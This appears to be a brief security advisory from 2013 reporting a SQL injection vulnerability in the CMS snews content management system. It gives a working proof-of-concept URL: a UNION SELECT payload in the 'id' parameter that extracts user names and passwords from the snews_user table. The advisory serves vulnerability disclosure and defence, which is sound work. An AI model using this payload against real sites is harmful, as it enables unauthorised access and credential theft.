CMS snews SQL Injection Vulnerability

Published on March 14th, 2013
Summary

CMS snews is prone to a SQL injection vulnerability.

Credit:

Details

Vulnerable Systems:
 * CMS snews

SQL poc:

http://localhost/snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Disclosure Timeline:
Published: 2013-01-15

Categories: Exploits
Tags:

Related Posts

Exploits Featured News

Cybercriminals Using WHO Alias For Phishing Campaign

Exploits Featured News

Coronavirus Outbreak Scam, Malware, Phishing Vulnerabilities

Exploits Featured

IBM Cognos Business Intelligence 10.2.2 Cross-Site Request Forgery (CSRF) Vulnerability